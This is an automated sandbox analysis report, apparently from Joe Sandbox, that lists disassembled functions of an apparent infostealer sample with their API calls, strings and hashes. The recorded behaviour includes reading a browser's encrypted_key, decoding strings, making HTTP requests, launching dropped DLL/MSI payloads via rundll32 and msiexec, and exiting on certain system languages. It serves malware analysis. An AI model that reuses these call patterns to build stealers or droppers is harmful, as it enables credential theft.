API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeString
String ID:
API String ID: 1052888304-3916222277
Opcode ID: 69dd5cc5fbc1761df270514c753d872e42db1c1284d06f70c8dc5feaac638415
Instruction ID: 419064b54de714d97490d8c6b723c3c7e74e2e58f609799ce286ab2ec45a5342
Opcode Fuzzy Hash: 69dd5cc5fbc1761df270514c753d872e42db1c1284d06f70c8dc5feaac638415
Instruction Fuzzy Hash: A2E12271900108ABDB48EBA4DC95FEE7778FF15300F444169F507E6991EF346A4ACB62

Function 008A9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008A906C

Strings

image/jpeg, xrefs: 008A9136

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: image/jpeg
API String ID: 2244384528-3785015651
Opcode ID: a71cfd8fcf18ea48ae792320d5bf3e5c38581625aefba9d90c899ee750b8f685
Instruction ID: 324565a25dc6c8ed155316e4b669b8d529e41ab1dc1dac7a64525acee73510db
Opcode Fuzzy Hash: a71cfd8fcf18ea48ae792320d5bf3e5c38581625aefba9d90c899ee750b8f685
Instruction Fuzzy Hash: 3871EAB1A10208ABDB04EFE4DD89FEEB7B8FB58700F148509F516E7290DB34A905CB61

Function 008A17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 008A17C5
ExitProcess.KERNEL32 ref: 008A17D1

Strings

block, xrefs: 008A17B7

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: block
API String ID: 621844428-2199623458
Opcode ID: 72b3e8ac4263c3d64a6aa1ac33fb7990d1031f7f6bba15f8c4b967e170a24a19
Instruction ID: 016c7f8b5f3a3272e855c20b77ff48b37fbb11a18ebff4b3b336bc56c6c485d6
Opcode Fuzzy Hash: 72b3e8ac4263c3d64a6aa1ac33fb7990d1031f7f6bba15f8c4b967e170a24a19
Instruction Fuzzy Hash: 405176B4A00209EBEF14DFA0D858ABF3BB5FB05308F148049E812E7790D774E942DB62

Function 008A2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

ShellExecuteEx.SHELL32(0000003C), ref: 008A31C5
ShellExecuteEx.SHELL32(0000003C), ref: 008A335D
ShellExecuteEx.SHELL32(0000003C), ref: 008A34EA

Strings

<, xrefs: 008A3490
"" , xrefs: 008A309A
/i ", xrefs: 008A33E4
/passive, xrefs: 008A345B
.msi, xrefs: 008A3398
C:\Windows\system32\msiexec.exe, xrefs: 008A34BF
.dll, xrefs: 008A31E5
C:\Windows\system32\rundll32.exe, xrefs: 008A3332

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: b71136e2401aa3e078c70184098a473baf60ced55f5ae928f448e3805fddb0e9
Instruction ID: 2ef185e8f2701092a208990b78ec0f3d1e640a9811f9942b4b1fb1b31d744b66
Opcode Fuzzy Hash: b71136e2401aa3e078c70184098a473baf60ced55f5ae928f448e3805fddb0e9
Instruction Fuzzy Hash: 0F12FE718001089AEB59EB94DC92EEEB738FF15300F544169F507A6991EF386B4ACF63

Function 008A52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 00896280: InternetOpenA.WININET(008B0DFE,00000001,00000000,00000000,00000000), ref: 008962E1
Part of subcall function 00896280: StrCmpCA.SHLWAPI(?,0142E808), ref: 00896303
Part of subcall function 00896280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00896335
Part of subcall function 00896280: HttpOpenRequestA.WININET(00000000,GET,?,0142E1B8,00000000,00000000,00400100,00000000), ref: 00896385
Part of subcall function 00896280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008963BF
Part of subcall function 00896280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008963D1

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008A5318
lstrlen.KERNEL32(00000000), ref: 008A532F

Part of subcall function 008A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008A8E52

StrStrA.SHLWAPI(00000000,00000000), ref: 008A5364
lstrlen.KERNEL32(00000000), ref: 008A5383
lstrlen.KERNEL32(00000000), ref: 008A53AE

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Strings

ERROR, xrefs: 008A5432
ERROR, xrefs: 008A53B9
ERROR, xrefs: 008A54A9
ERROR, xrefs: 008A530A
ERROR, xrefs: 008A546F

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3240024479-1526165396
Opcode ID: 586ec136922f79285385fa72eaca6457ab901db26a4b60b598cfdbde460927af
Instruction ID: 426da856408f66078daba938f4954fb7bf7d4895d8c0217bc958dc98cd242b98
Opcode Fuzzy Hash: 586ec136922f79285385fa72eaca6457ab901db26a4b60b598cfdbde460927af
Instruction Fuzzy Hash: 0551BA709101489BEB58FF68C996AEE7779FF16301F504028E406DAD91EF386B46CB63

Function 008A12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID:
API String ID: 2001356338-0
Opcode ID: c8b83f2f804ef78023135382e53b517cbed0e325df2e9b5926b0e8cdf988f94b
Instruction ID: a32cf46a96504953ede7500edde8b5b06f76be8076f58f0121eae1947ac225e6
Opcode Fuzzy Hash: c8b83f2f804ef78023135382e53b517cbed0e325df2e9b5926b0e8cdf988f94b
Instruction Fuzzy Hash: EAC1B7B5D011189BDB18EFA4DC89FEA7378FB64304F004599F10AE7541EB74AA85CFA2

Function 008A4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008A8E0B

lstrcat.KERNEL32(?,00000000), ref: 008A42EC
lstrcat.KERNEL32(?,0142E188), ref: 008A430B
lstrcat.KERNEL32(?,?), ref: 008A431F
lstrcat.KERNEL32(?,0142D488), ref: 008A4333

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008A8D90: GetFileAttributesA.KERNEL32(00000000,?,00891B54,?,?,008B564C,?,?,008B0E1F), ref: 008A8D9F

Part of subcall function 00899CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00899D39

Part of subcall function 008999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008999EC
Part of subcall function 008999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00899A11
Part of subcall function 008999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00899A31
Part of subcall function 008999C0: ReadFile.KERNEL32(000000FF,?,00000000,0089148F,00000000), ref: 00899A5A
Part of subcall function 008999C0: LocalFree.KERNEL32(0089148F), ref: 00899A90
Part of subcall function 008999C0: CloseHandle.KERNEL32(000000FF), ref: 00899A9A

Part of subcall function 008A93C0: GlobalAlloc.KERNEL32(00000000,008A43DD,008A43DD), ref: 008A93D3

StrStrA.SHLWAPI(?,0142E290), ref: 008A43F3
GlobalFree.KERNEL32(?), ref: 008A4512

Part of subcall function 00899AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00894EEE,00000000,00000000), ref: 00899AEF
Part of subcall function 00899AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00894EEE,00000000,?), ref: 00899B01
Part of subcall function 00899AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00894EEE,00000000,00000000), ref: 00899B2A
Part of subcall function 00899AC0: LocalFree.KERNEL32(?,?,?,?,00894EEE,00000000,?), ref: 00899B3F

lstrcat.KERNEL32(?,00000000), ref: 008A44A3
StrCmpCA.SHLWAPI(?,008B08D1), ref: 008A44C0
lstrcat.KERNEL32(00000000,00000000), ref: 008A44D2
lstrcat.KERNEL32(00000000,?), ref: 008A44E5
lstrcat.KERNEL32(00000000,008B0FB8), ref: 008A44F4

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 3541710228-0
Opcode ID: aa37a82dbdec9dcfd1bfe08ebe80049e9fc45c2d977538d8cff7711c412430cb
Instruction ID: 5421f1c9a94e5ddfa7856a70d3231c8f4e9d5f5426dbf07e915b0251773c91be
Opcode Fuzzy Hash: aa37a82dbdec9dcfd1bfe08ebe80049e9fc45c2d977538d8cff7711c412430cb
Instruction Fuzzy Hash: CB7152B6900208ABDF14EBE4DC85FEE7379FB89300F044598F606D6581EA74DB45CBA2

Function 008A6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 008A6774
ExitProcess.KERNEL32 ref: 008A67A5
ExitProcess.KERNEL32 ref: 008A67AF
ExitProcess.KERNEL32 ref: 008A67B9
ExitProcess.KERNEL32 ref: 008A67C3
ExitProcess.KERNEL32 ref: 008A67CD

Strings

*, xrefs: 008A678C

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

